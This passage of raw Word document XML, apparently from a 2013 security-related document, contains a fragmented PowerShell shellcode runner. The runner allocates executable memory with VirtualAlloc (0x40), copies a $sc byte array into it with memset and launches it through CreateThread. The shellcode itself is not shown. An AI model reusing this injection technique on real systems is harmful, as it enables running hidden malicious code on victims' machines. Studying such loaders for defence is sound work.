          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(0,0x1000,$size,0x40)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# </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>build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it in memory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for ($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=0;$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -le ($sc.Length-1);$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>++) {$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>winFunc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>memset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>([</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IntPtr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]($x.ToInt32()+$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>), $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>], 1)}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Try {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       $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>winFunc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CreateThread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(0,0,$x,0,0,0)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       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sleep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100000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   }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Catch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{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996BFF" w:rsidRP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 [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system.exception</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996BFF" w:rsidRPr="00996BFF" w:rsidRDefault="00996BFF" w:rsidP="00996BFF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996BFF">
        <w:rPr>
          <w:color w:val="606060"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>caught</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a system exception"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996BFF" w:rsidRDefault="00996BFF" w:rsidP="00996BFF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 w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="606060"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996BFF" w:rsidRDefault="00996BFF"/>
    <w:p w:rsidR="00996BFF" w:rsidRDefault="00996BFF"/>
    <w:sectPr w:rsidR="0099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03"/>
    <w:rsid w:val="00082F0F"/>
    <w:rsid w:val="00196903"/>
    <w:rsid w:val="00203EEE"/>
    <w:rsid w:val="00283ECC"/>
    <w:rsid w:val="00604DC5"/>
    <w:rsid w:val="00845C8D"/>
    <w:rsid w:val="00996BFF"/>
    <w:rsid w:val="009C4392"/>
    <w:rsid w:val="00A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903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90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6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0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4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36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58493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5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12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62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673339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87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13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964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6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516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30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single" w:sz="6" w:space="3" w:color="C0C0C0"/>
                                                                                                        <w:left w:val="single" w:sz="6" w:space="3" w:color="C0C0C0"/>
                                                                                                        <w:bottom w:val="single" w:sz="6" w:space="3" w:color="C0C0C0"/>
                                                                                                        <w:right w:val="single" w:sz="6" w:space="3" w:color="C0C0C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3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0854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629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622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57993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19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253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48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124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5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30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single" w:sz="6" w:space="3" w:color="C0C0C0"/>
                                                                                                        <w:left w:val="single" w:sz="6" w:space="3" w:color="C0C0C0"/>
                                                                                                        <w:bottom w:val="single" w:sz="6" w:space="3" w:color="C0C0C0"/>
                                                                                                        <w:right w:val="single" w:sz="6" w:space="3" w:color="C0C0C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Bordewijk, Lourens (NL - Amstelveen)</dc:creator>
  <cp:lastModifiedBy>Bordewijk, Lourens (NL - Amstelveen)</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-07-12T06:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-07-12T15:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>